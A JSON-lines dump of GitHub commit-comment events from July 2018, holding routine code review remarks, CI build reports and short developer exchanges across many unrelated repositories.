{"id":"8013858596","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"MARKETProtocol/MARKET.js"},"payload":{"comment":{"id":29823285,"position":104,"line":205,"path":"src/Market.ts","commit_id":"d3e0902b291c0142ee58e42b03a8a06535f7c403","created_at":"2018-07-25T02:53:24Z","updated_at":"2018-07-25T02:53:24Z","author_association":"NONE","body":"marketContractAddress: string,"}},"created_at":"2018-07-25T02:53:24Z"}
{"id":"8013861707","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"MARKETProtocol/MARKET.js"},"payload":{"comment":{"id":29823286,"position":null,"line":null,"path":null,"commit_id":"d3e0902b291c0142ee58e42b03a8a06535f7c403","created_at":"2018-07-25T02:54:30Z","updated_at":"2018-07-25T02:54:30Z","author_association":"NONE","body":"d3e0902"}},"created_at":"2018-07-25T02:54:30Z"}
{"id":"8013870815","type":"CommitCommentEvent","actor":{"login":"bobclewell"},"repo":{"name":"apostrophecms/apostrophe"},"payload":{"comment":{"id":29823295,"position":null,"line":null,"path":null,"commit_id":"b9f752fcc7fdf7806cb553ca24e3533f47b263a9","created_at":"2018-07-25T02:57:36Z","updated_at":"2018-07-25T02:57:36Z","author_association":"CONTRIBUTOR","body":"Thanks for the feedback."}},"created_at":"2018-07-25T02:57:36Z"}
{"id":"8013876628","type":"CommitCommentEvent","actor":{"login":"virginiayung"},"repo":{"name":"virginiayung/scipy_proceedings"},"payload":{"comment":{"id":29823300,"position":38,"line":117,"path":"papers/virginia_ng/Scipy2018_first_draft.rst","commit_id":"2458d2aa294aced1785394660c3ea434b4493fd1","created_at":"2018-07-25T02:59:46Z","updated_at":"2018-07-25T02:59:46Z","author_association":"OWNER","body":"> Convolutions also enable computation of predictions at different positions in an image in an optimized way. Fully convolutional neural networks used for object detection tasks are therefore more computational efficient than sliding window approaches [cite0]_, in which predictions are computed separately at every potential position. \r\n\r\nGoing to leave this section out. I couldn't find enough empirical evidence on this.\r\n\r\n"}},"created_at":"2018-07-25T02:59:46Z"}
{"id":"8013876846","type":"CommitCommentEvent","actor":{"login":"notestaff"},"repo":{"name":"broadinstitute/viral-ngs"},"payload":{"comment":{"id":29823301,"position":5,"line":233,"path":"util/misc.py","commit_id":"4dea8e23fe8dc4427604414415132867bf384238","created_at":"2018-07-25T02:59:51Z","updated_at":"2018-07-25T02:59:51Z","author_association":"CONTRIBUTOR","body":"@tomkinsc maybe just put stderr=subprocess.STDOUT in the function declaration?\r\nin theory some of these markers like subprocess.DEVNULL could have a False boolean value, then this still ends up with subprocess.STDOUT"}},"created_at":"2018-07-25T02:59:51Z"}
{"id":"8018703701","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29834744,"position":null,"line":null,"path":null,"commit_id":"eb6f0415d81fbe00477d78b69640d88508870b9a","created_at":"2018-07-25T20:00:10Z","updated_at":"2018-07-25T20:00:10Z","author_association":"NONE","body":"I don't really think it's that hard to read, it's pretty common thing to use stuff like that... Even I have no trouble reading this and I'm not really a C/C++ programmer at all."}},"created_at":"2018-07-25T20:00:10Z"}
{"id":"8018705002","type":"CommitCommentEvent","actor":{"login":"murielsilveira"},"repo":{"name":"gabriel-lima/thinking-in-react-example"},"payload":{"comment":{"id":29834749,"position":126,"line":126,"path":"src/index.js","commit_id":"e0e39291471d81e1219ec2ea92f14cb2b09463b2","created_at":"2018-07-25T20:00:24Z","updated_at":"2018-07-25T20:00:24Z","author_association":"NONE","body":"for checkboxes try to keep the checked state in sync with the element.\r\n\r\n```\r\n<input\r\n    type=\"checkbox\"\r\n    id=\"in-stock-only\"\r\n    checked={this.state. inStockOnly}\r\n    onChange={this.handleInStockOnly}\r\n/>\r\n```"}},"created_at":"2018-07-25T20:00:24Z"}
{"id":"8018706909","type":"CommitCommentEvent","actor":{"login":"Brad-Christie"},"repo":{"name":"Brad-Christie-CI/appveyor-docker"},"payload":{"comment":{"id":29834750,"position":null,"line":null,"path":null,"commit_id":"8c33840f0f51eb716ea3a80ea2d42d713c4ab8aa","created_at":"2018-07-25T20:00:45Z","updated_at":"2018-07-25T20:00:45Z","author_association":"CONTRIBUTOR","body":"AppVeyor caches various images, but `microsoft/iis` is not one of them. By mimicking the IIS image (basically copying how it's built from https://github.com/Microsoft/iis-docker) I'm able to shorten the build time to nearly half. Now, AppVeyor doesn't have to first retrieve the `microsoft/iis` image."}},"created_at":"2018-07-25T20:00:45Z"}
{"id":"8018707691","type":"CommitCommentEvent","actor":{"login":"cpshanley"},"repo":{"name":"MaxBazarov/exporter"},"payload":{"comment":{"id":29834753,"position":null,"line":null,"path":null,"commit_id":"9851093614f4d4eac955f0a2abff3fa1aca79c5d","created_at":"2018-07-25T20:00:54Z","updated_at":"2018-07-25T20:00:54Z","author_association":"NONE","body":"Hi Max. Right! Hotspots in symbols. Yes, I am using those.\r\nActually, that's why back to Previous Artboard (I have it for the Back button or the grabber menu).\r\nBut it doesn't seem to work. The Previous Artboard is ignored when I export. Am I doing something wrong?\r\nCin cin\r\n"}},"created_at":"2018-07-25T20:00:54Z"}
{"id":"8018708842","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"gkalpak/angular"},"payload":{"comment":{"id":29834756,"position":8,"line":39,"path":"packages/compiler-cli/src/ngcc/src/host/esm5_host.ts","commit_id":"fc0fda6732146fa895cd1ff76c540bef4cc0da07","created_at":"2018-07-25T20:01:09Z","updated_at":"2018-07-25T20:01:09Z","author_association":"NONE","body":"That is weird! So the TS compiler somehow merges the typings with the original code? Does it maintain nodes to the original JS for the implementations but for classes it uses the .d.ts nodes? I am not sure how that would hold together..."}},"created_at":"2018-07-25T20:01:09Z"}
{"id":"8018710278","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29834760,"position":null,"line":null,"path":null,"commit_id":"ef94d840e79fc7081fd4a870835a6f1aba892467","created_at":"2018-07-25T20:01:25Z","updated_at":"2018-07-25T20:01:25Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [031 - Corrigir classes e melhorar arquitetura do software](https://trello.com/c/kznI5AfF/39-031-corrigir-classes-e-melhorar-arquitetura-do-software)"}},"created_at":"2018-07-25T20:01:25Z"}
{"id":"8018712748","type":"CommitCommentEvent","actor":{"login":"mdamien"},"repo":{"name":"regardscitoyens/the-law-factory"},"payload":{"comment":{"id":29834764,"position":5,"line":394,"path":"public/modules/navettes/navettes.viz.js","commit_id":"a176ae1a3784cc7ae8feb07db2a9558bcb17f8f5","created_at":"2018-07-25T20:01:55Z","updated_at":"2018-07-25T20:01:55Z","author_association":"MEMBER","body":"Je ne pense pas que l'on ai de cas où l'étape n'à pas de date mais à une date de fin. Deja que les `enddate` ne sont pas encore très bien gérés (ni gérés par anpy, ni par senapy)"}},"created_at":"2018-07-25T20:01:55Z"}
{"id":"8018712755","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834765,"position":37,"line":82,"path":"java-source/src/main/java/net/corda/training/flow/IOUIssueFlow.java","commit_id":"1f88b61ea6065367360d975c8fbabdfd5cd0edee","created_at":"2018-07-25T20:01:55Z","updated_at":"2018-07-25T20:01:55Z","author_association":"NONE","body":"Name should be specific to the flow that initiates it => IOUIssueFlowResponder"}},"created_at":"2018-07-25T20:01:55Z"}
{"id":"8018713920","type":"CommitCommentEvent","actor":{"login":"SrikrushnaP"},"repo":{"name":"SrikrushnaP/angular_tutorial"},"payload":{"comment":{"id":29834767,"position":null,"line":null,"path":null,"commit_id":"f061c494c93b1f91ec7d0e89a5b48a8021cbfa4e","created_at":"2018-07-25T20:02:10Z","updated_at":"2018-07-25T20:02:10Z","author_association":"OWNER","body":"If you have old version of RXJS update using the below comad to fix some error\r\n**npm install rxjs-compat --save**"}},"created_at":"2018-07-25T20:02:10Z"}
{"id":"8018714402","type":"CommitCommentEvent","actor":{"login":"KarlOfDuty"},"repo":{"name":"Grover-c13/Smod2"},"payload":{"comment":{"id":29834768,"position":null,"line":null,"path":null,"commit_id":"fbe191d3e6a5d79b8f09bdb3d5ecb72303439952","created_at":"2018-07-25T20:02:16Z","updated_at":"2018-07-25T20:02:16Z","author_association":"NONE","body":"As it has a time component it would be more likely to be a player getting killed by 049."}},"created_at":"2018-07-25T20:02:16Z"}
{"id":"8018722124","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29834780,"position":null,"line":null,"path":null,"commit_id":"5c85ed64fb4492a0d0a1c197b246208afcd1ad34","created_at":"2018-07-25T20:03:48Z","updated_at":"2018-07-25T20:03:48Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - x86_64-MacOS-10.9-clang: OK (2948 of 2948 tests passed, 623 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 8 tests had: AUD diffs.\n * 1 test had: ERR diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5c85ed64fb4492a0d0a1c197b246208afcd1ad34-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5c85ed64fb4492a0d0a1c197b246208afcd1ad34-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T20:03:48Z"}
{"id":"8018722390","type":"CommitCommentEvent","actor":{"login":"david4096"},"repo":{"name":"DataBiosphere/dos-azul-lambda"},"payload":{"comment":{"id":29834783,"position":262,"line":242,"path":"app.py","commit_id":"6894d252469ed926b6d6ee81b2852a5e4e3acc90","created_at":"2018-07-25T20:03:51Z","updated_at":"2018-07-25T20:03:51Z","author_association":"MEMBER","body":"thats a 404 right?"}},"created_at":"2018-07-25T20:03:51Z"}
{"id":"8018722710","type":"CommitCommentEvent","actor":{"login":"Sphar-io"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834785,"position":24,"line":24,"path":"java-source/src/main/java/net/corda/training/state/IOUState.java","commit_id":"6ce4cf43e59f94b5a70db6404c27c41d5fbea865","created_at":"2018-07-25T20:03:55Z","updated_at":"2018-07-25T20:03:55Z","author_association":"OWNER","body":"All the states,flows, etc. are in their own packages, so IOUState can't be imported by any of those unless it's public. The alternative would be simplifying the packages into \"net.corda.trading\" - thoughts?"}},"created_at":"2018-07-25T20:03:55Z"}
{"id":"8018725978","type":"CommitCommentEvent","actor":{"login":"Brad-Christie"},"repo":{"name":"Brad-Christie-CI/appveyor-docker"},"payload":{"comment":{"id":29834789,"position":null,"line":null,"path":null,"commit_id":"53607e08b4307c66f308a8a5a10e43f60ecbb005","created_at":"2018-07-25T20:04:35Z","updated_at":"2018-07-25T20:04:35Z","author_association":"CONTRIBUTOR","body":"while trivial in this example, the files local to the Dockerfile are bundled during the build process. This enabled commands like `ADD` and `COPY` to import local files into the image.\r\n\r\nThis change can be observed via the following lines:\r\n`Sending build context to Docker daemon  88.58kB`\r\n`Sending build context to Docker daemon  3.072kB`\r\n\r\nHad there been .zip or .exe files alongside the Dockerfile, this change would be more significant."}},"created_at":"2018-07-25T20:04:35Z"}
{"id":"8018729485","type":"CommitCommentEvent","actor":{"login":"murielsilveira"},"repo":{"name":"gabriel-lima/thinking-in-react-example"},"payload":{"comment":{"id":29834793,"position":172,"line":172,"path":"src/index.js","commit_id":"e0e39291471d81e1219ec2ea92f14cb2b09463b2","created_at":"2018-07-25T20:05:20Z","updated_at":"2018-07-25T20:05:20Z","author_association":"NONE","body":"I would try to avoid this kind of render function. this normally smells like a missing component."}},"created_at":"2018-07-25T20:05:20Z"}
{"id":"8018733313","type":"CommitCommentEvent","actor":{"login":"natanlao"},"repo":{"name":"DataBiosphere/dos-azul-lambda"},"payload":{"comment":{"id":29834799,"position":262,"line":242,"path":"app.py","commit_id":"6894d252469ed926b6d6ee81b2852a5e4e3acc90","created_at":"2018-07-25T20:06:09Z","updated_at":"2018-07-25T20:06:09Z","author_association":"COLLABORATOR","body":"Yes - good catch, I'll fix that. Thanks!\n\nOn Wed, Jul 25, 2018, 1:03 PM David Steinberg <notifications@github.com>\nwrote:\n\n> thats a 404 right?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/DataBiosphere/dos-azul-lambda/commit/6894d252469ed926b6d6ee81b2852a5e4e3acc90#commitcomment-29834783>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AWJOIuagyK2H-UuxP50IeCBY2_USxNFFks5uKM8ngaJpZM4Vgtnw>\n> .\n>\n"}},"created_at":"2018-07-25T20:06:09Z"}
{"id":"8018738568","type":"CommitCommentEvent","actor":{"login":"grisad2"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29834813,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T20:07:16Z","updated_at":"2018-07-25T20:07:16Z","author_association":"NONE","body":"rrr"}},"created_at":"2018-07-25T20:07:16Z"}
{"id":"8018739059","type":"CommitCommentEvent","actor":{"login":"dmiralles2009"},"repo":{"name":"dmiralles2009/gnss-sdr"},"payload":{"comment":{"id":29834816,"position":48,"line":135,"path":"src/algorithms/telemetry_decoder/gnuradio_blocks/beidou_b2a_telemetry_decoder_cc.cc","commit_id":"337fdb1cd2a973b0c67f805b364ffc28735a03ea","created_at":"2018-07-25T20:07:22Z","updated_at":"2018-07-25T20:07:22Z","author_association":"OWNER","body":"Never use hardcoded values, create a variable to store the data length for cnav meesage and use that instead. Also why is this value starting at 1. C is 0 indexed , MATLAB is 1 indexed"}},"created_at":"2018-07-25T20:07:22Z"}
{"id":"8018740282","type":"CommitCommentEvent","actor":{"login":"Positivism"},"repo":{"name":"vergecurrency/vIOS"},"payload":{"comment":{"id":29834820,"position":null,"line":null,"path":null,"commit_id":"735b7264406b253af97bd479a49e89a1231189a3","created_at":"2018-07-25T20:07:39Z","updated_at":"2018-07-25T20:07:39Z","author_association":"NONE","body":"Quite beautiful, is there going to be an option to skip this screen or are we going to force them to encrypt? Shouldn't matter too much since most people will use their phone lock anyway."}},"created_at":"2018-07-25T20:07:39Z"}
{"id":"8018740729","type":"CommitCommentEvent","actor":{"login":"RouxRC"},"repo":{"name":"regardscitoyens/the-law-factory"},"payload":{"comment":{"id":29834822,"position":5,"line":394,"path":"public/modules/navettes/navettes.viz.js","commit_id":"a176ae1a3784cc7ae8feb07db2a9558bcb17f8f5","created_at":"2018-07-25T20:07:45Z","updated_at":"2018-07-25T20:07:45Z","author_association":"MEMBER","body":"ok mais dans ce cas faut mettre s.enddate || s.date alors plutôt non?"}},"created_at":"2018-07-25T20:07:45Z"}
{"id":"8018744575","type":"CommitCommentEvent","actor":{"login":"dmiralles2009"},"repo":{"name":"dmiralles2009/gnss-sdr"},"payload":{"comment":{"id":29834835,"position":71,"line":71,"path":"src/algorithms/telemetry_decoder/libs/crc24q.c","commit_id":"337fdb1cd2a973b0c67f805b364ffc28735a03ea","created_at":"2018-07-25T20:08:33Z","updated_at":"2018-07-25T20:08:33Z","author_association":"OWNER","body":"You need to remove the main function from this file, otherwise it will fail. Note that you re adding these files as a library and not as a main function"}},"created_at":"2018-07-25T20:08:33Z"}
{"id":"8018745595","type":"CommitCommentEvent","actor":{"login":"franci22"},"repo":{"name":"franci22/BNoteBot"},"payload":{"comment":{"id":29834839,"position":null,"line":null,"path":null,"commit_id":"1e7741d457b4e90736d660b85bf778351d4b2e31","created_at":"2018-07-25T20:08:45Z","updated_at":"2018-07-25T20:08:45Z","author_association":"OWNER","body":"After this commit it should be executed `UPDATE * FROM BNoteBot_user SET type = 'text'`."}},"created_at":"2018-07-25T20:08:45Z"}
{"id":"8018745823","type":"CommitCommentEvent","actor":{"login":"amjadkhan1995"},"repo":{"name":"HanSolo/tilesfx"},"payload":{"comment":{"id":29834840,"position":null,"line":null,"path":null,"commit_id":"37f823d8c77c60915847395d3bd6b096ade949a6","created_at":"2018-07-25T20:08:48Z","updated_at":"2018-07-25T20:08:48Z","author_association":"NONE","body":" I imported Medusa 8.0 jar to scene builder and it shows only one item, is that normal?"}},"created_at":"2018-07-25T20:08:48Z"}
{"id":"8018748746","type":"CommitCommentEvent","actor":{"login":"dmiralles2009"},"repo":{"name":"dmiralles2009/gnss-sdr"},"payload":{"comment":{"id":29834845,"position":5,"line":36,"path":"src/core/system_parameters/beidou_cnav2_navigation_message.cc","commit_id":"337fdb1cd2a973b0c67f805b364ffc28735a03ea","created_at":"2018-07-25T20:09:25Z","updated_at":"2018-07-25T20:09:25Z","author_association":"OWNER","body":"You do not include .c files, you include only .h files. Should be changed to `#include \"crc24q.h\"`"}},"created_at":"2018-07-25T20:09:25Z"}
{"id":"8018748819","type":"CommitCommentEvent","actor":{"login":"lhuynh27"},"repo":{"name":"ErrBnB/images_service"},"payload":{"comment":{"id":29834846,"position":null,"line":null,"path":null,"commit_id":"84a697f862d883dca1619c508b0492fa01f050dc","created_at":"2018-07-25T20:09:26Z","updated_at":"2018-07-25T20:09:26Z","author_association":"COLLABORATOR","body":"Merging PR with master"}},"created_at":"2018-07-25T20:09:26Z"}
{"id":"8018755029","type":"CommitCommentEvent","actor":{"login":"dmiralles2009"},"repo":{"name":"dmiralles2009/gnss-sdr"},"payload":{"comment":{"id":29834857,"position":null,"line":null,"path":null,"commit_id":"337fdb1cd2a973b0c67f805b364ffc28735a03ea","created_at":"2018-07-25T20:10:43Z","updated_at":"2018-07-25T20:10:43Z","author_association":"OWNER","body":"You are making good progress. Keep up the good job"}},"created_at":"2018-07-25T20:10:43Z"}
{"id":"8018767009","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29834884,"position":null,"line":null,"path":null,"commit_id":"73281ffba303cbd55bfa8f4e7e5646843f39866d","created_at":"2018-07-25T20:13:12Z","updated_at":"2018-07-25T20:13:12Z","author_association":"NONE","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2322 of 2322 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T20:13:12Z"}
{"id":"8018774353","type":"CommitCommentEvent","actor":{"login":"murielsilveira"},"repo":{"name":"gabriel-lima/thinking-in-react-example"},"payload":{"comment":{"id":29834894,"position":153,"line":153,"path":"src/index.js","commit_id":"e0e39291471d81e1219ec2ea92f14cb2b09463b2","created_at":"2018-07-25T20:14:43Z","updated_at":"2018-07-25T20:14:43Z","author_association":"NONE","body":"This is not so relevant, but as you are assuming that the products are ordered by category I would go with a reduce and without the extra arrays."}},"created_at":"2018-07-25T20:14:43Z"}
{"id":"8018775116","type":"CommitCommentEvent","actor":{"login":"MaxBazarov"},"repo":{"name":"MaxBazarov/exporter"},"payload":{"comment":{"id":29834896,"position":null,"line":null,"path":null,"commit_id":"9851093614f4d4eac955f0a2abff3fa1aca79c5d","created_at":"2018-07-25T20:14:51Z","updated_at":"2018-07-25T20:14:51Z","author_association":"OWNER","body":"Currently our plugin ignores Previous Artboard setting.\nI think it’s possible to support it soon.\n\n> On 25 Jul 2018, at 23:00, cpshanley <notifications@github.com> wrote:\n> \n> Hi Max. Right! Hotspots in symbols. Yes, I am using those.\n> Actually, that's why back to Previous Artboard (I have it for the Back button or the grabber menu).\n> But it doesn't seem to work. The Previous Artboard is ignored when I export. Am I doing something wrong?\n> Cin cin\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/MaxBazarov/exporter/commit/9851093614f4d4eac955f0a2abff3fa1aca79c5d#commitcomment-29834753>, or mute the thread <https://github.com/notifications/unsubscribe-auth/ARkKghFNi72uP2-DPF2PsO1tefNwDEYGks5uKM53gaJpZM4VgkS9>.\n> \n\n"}},"created_at":"2018-07-25T20:14:51Z"}
{"id":"8018775281","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29834900,"position":null,"line":null,"path":null,"commit_id":"cc4134221e13e529bae25ff342d73f2109b9f63f","created_at":"2018-07-25T20:14:54Z","updated_at":"2018-07-25T20:14:54Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [fixcaching](https://fixcaching-static-docs.pantheonsite.io/docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/82c323e21927a43e41c30426fce2b8e28c437fc1/.circleci/config.yml)\n"}},"created_at":"2018-07-25T20:14:54Z"}
{"id":"8018778166","type":"CommitCommentEvent","actor":{"login":"m4nt4s"},"repo":{"name":"honey-comb/galleries"},"payload":{"comment":{"id":29834911,"position":16,"line":16,"path":"src/database/migrations/2018_07_23_150121_drop_gallery_tag_tables.php","commit_id":"63a6d413b8ca87298ea2f76fc6d8c0106aa6c8ef","created_at":"2018-07-25T20:15:28Z","updated_at":"2018-07-25T20:15:28Z","author_association":"MEMBER","body":"@jdmitrijev  must use `Schema::dropIfExists`"}},"created_at":"2018-07-25T20:15:28Z"}
{"id":"8018779245","type":"CommitCommentEvent","actor":{"login":"mdcw9"},"repo":{"name":"xtr33me/Reinforcement_Learning_for_Stock_Prediction"},"payload":{"comment":{"id":29834912,"position":null,"line":null,"path":null,"commit_id":"59c5653b87cb8adbf9acfa631fedb6ac240b5e72","created_at":"2018-07-25T20:15:42Z","updated_at":"2018-07-25T20:15:42Z","author_association":"NONE","body":"For some reason your code, after opening Tensorflow backend, just crashes. Original works fine."}},"created_at":"2018-07-25T20:15:42Z"}
{"id":"8018781178","type":"CommitCommentEvent","actor":{"login":"EnikoKancsar"},"repo":{"name":"josanandi/GitPro"},"payload":{"comment":{"id":29834915,"position":null,"line":null,"path":null,"commit_id":"d841f7368a689ccbdd8b588fe86ce3847ca1be3a","created_at":"2018-07-25T20:16:07Z","updated_at":"2018-07-25T20:16:07Z","author_association":"COLLABORATOR","body":"Nem találok olyat, hogy accept vagy hasonló, commentelek, hátha működik akkor 😀"}},"created_at":"2018-07-25T20:16:07Z"}
{"id":"8018781665","type":"CommitCommentEvent","actor":{"login":"cpshanley"},"repo":{"name":"MaxBazarov/exporter"},"payload":{"comment":{"id":29834917,"position":null,"line":null,"path":null,"commit_id":"9851093614f4d4eac955f0a2abff3fa1aca79c5d","created_at":"2018-07-25T20:16:13Z","updated_at":"2018-07-25T20:16:13Z","author_association":"NONE","body":"Brilliant. Top man.\r\nOverlays after that, I hope!\r\nAll the best, Colin."}},"created_at":"2018-07-25T20:16:13Z"}
{"id":"8018786814","type":"CommitCommentEvent","actor":{"login":"declanbarr"},"repo":{"name":"declanbarr/DowJones"},"payload":{"comment":{"id":29834925,"position":null,"line":null,"path":null,"commit_id":"2561dc73f7c68550aae4fe25421ac0506d949f3a","created_at":"2018-07-25T20:17:14Z","updated_at":"2018-07-25T20:17:14Z","author_association":"OWNER","body":"From checking on IPython, the columns for Open, Close, High and Low all gave similar output for describe() - count, unique, top and freq. On searching, I found that the problem is due to pandas not recognising the data as a number. This is probably due to the presence of the dollar sign in the data. "}},"created_at":"2018-07-25T20:17:14Z"}
{"id":"8018790773","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Minetron-26/BasicCommands"},"payload":{"comment":{"id":29834930,"position":null,"line":null,"path":null,"commit_id":"0378365db25d2670e6b436bfbed0fd2691ac80b3","created_at":"2018-07-25T20:18:02Z","updated_at":"2018-07-25T20:18:02Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: Level 0: yaml_parse(): scanning error\nencountered during parsing: mapping values are not allowed in this context\n(line 7, column 9) in /poggit/src/poggit/webhook/PushHandler.php#75\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Minetron-26/BasicCommands/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `d3f5efac-9047-11e8-9cd6-61b2c737a0af`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-25T20:18:02Z"}
{"id":"8018794273","type":"CommitCommentEvent","actor":{"login":"fabled"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29834935,"position":null,"line":null,"path":null,"commit_id":"6c21984c5b86ca03c72a88927f8c1de0c420e25f","created_at":"2018-07-25T20:18:46Z","updated_at":"2018-07-25T20:18:46Z","author_association":"CONTRIBUTOR","body":"@jirutka You had your time to review it earlier, why did you not comment back then?I happened to want this, and it is testing repository. The requirements are not the same there as for main and community. But granted, I did skip steps I should have done. Instead of whining, please submit a commit that fixes all the problems you found. Thank you."}},"created_at":"2018-07-25T20:18:46Z"}
{"id":"8018794361","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29834936,"position":null,"line":null,"path":null,"commit_id":"0e3723ff7a59eb1f731f1d230cad93c31dae348f","created_at":"2018-07-25T20:18:47Z","updated_at":"2018-07-25T20:18:47Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-1043](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-1043).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1043-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-25T20:18:47Z"}
{"id":"8018797469","type":"CommitCommentEvent","actor":{"login":"Duke7467"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29834947,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T20:19:25Z","updated_at":"2018-07-25T20:19:25Z","author_association":"NONE","body":"rrr"}},"created_at":"2018-07-25T20:19:25Z"}
{"id":"8018802857","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29834960,"position":null,"line":null,"path":null,"commit_id":"333971814f38c25a39f7d12da41e46813302185a","created_at":"2018-07-25T20:20:30Z","updated_at":"2018-07-25T20:20:30Z","author_association":"OWNER","body":"Addressed in fae5d42 "}},"created_at":"2018-07-25T20:20:30Z"}
{"id":"8018807241","type":"CommitCommentEvent","actor":{"login":"mdcw9"},"repo":{"name":"xtr33me/Reinforcement_Learning_for_Stock_Prediction"},"payload":{"comment":{"id":29834970,"position":null,"line":null,"path":null,"commit_id":"59c5653b87cb8adbf9acfa631fedb6ac240b5e72","created_at":"2018-07-25T20:21:20Z","updated_at":"2018-07-25T20:21:20Z","author_association":"NONE","body":"Do you know how you graphically represent the results?\r\n\r\nAlso, is there a way to train on multiple stocks like Siraj did? I.e. he used APPL, AMZN, FB, NFLX etc as predictors for the GOOG test.\r\n\r\nGreat work on the fixes by the way."}},"created_at":"2018-07-25T20:21:20Z"}
{"id":"8018807538","type":"CommitCommentEvent","actor":{"login":"3buson"},"repo":{"name":"celtra/stateless-components"},"payload":{"comment":{"id":29834971,"position":35,"line":42,"path":"src/stateless/input.vue","commit_id":"b6dc57c7d52f675e0ce985a4c8cf7710014f1631","created_at":"2018-07-25T20:21:23Z","updated_at":"2018-07-25T20:21:23Z","author_association":"CONTRIBUTOR","body":"@matevzStinjek can you check and resolve that"}},"created_at":"2018-07-25T20:21:23Z"}
{"id":"8018807793","type":"CommitCommentEvent","actor":{"login":"jamesmunns"},"repo":{"name":"denysvitali/blurz"},"payload":{"comment":{"id":29834972,"position":24,"line":157,"path":"src/bluetooth_gatt_characteristic.rs","commit_id":"ba6c9d4cad456dcdb3167684086bd7652d109e7f","created_at":"2018-07-25T20:21:27Z","updated_at":"2018-07-25T20:21:27Z","author_association":"NONE","body":"These unwraps should probably be replaced with a `?`"}},"created_at":"2018-07-25T20:21:27Z"}
{"id":"8018809459","type":"CommitCommentEvent","actor":{"login":"phated"},"repo":{"name":"contra/react-responsive"},"payload":{"comment":{"id":29834978,"position":null,"line":null,"path":null,"commit_id":"e65a304408d1df9cc792a7e3bb5aa8efaee4b678","created_at":"2018-07-25T20:21:46Z","updated_at":"2018-07-25T20:21:46Z","author_association":"CONTRIBUTOR","body":"Not good enough. I think all the docs should be deleted to accurately reflect intent."}},"created_at":"2018-07-25T20:21:46Z"}
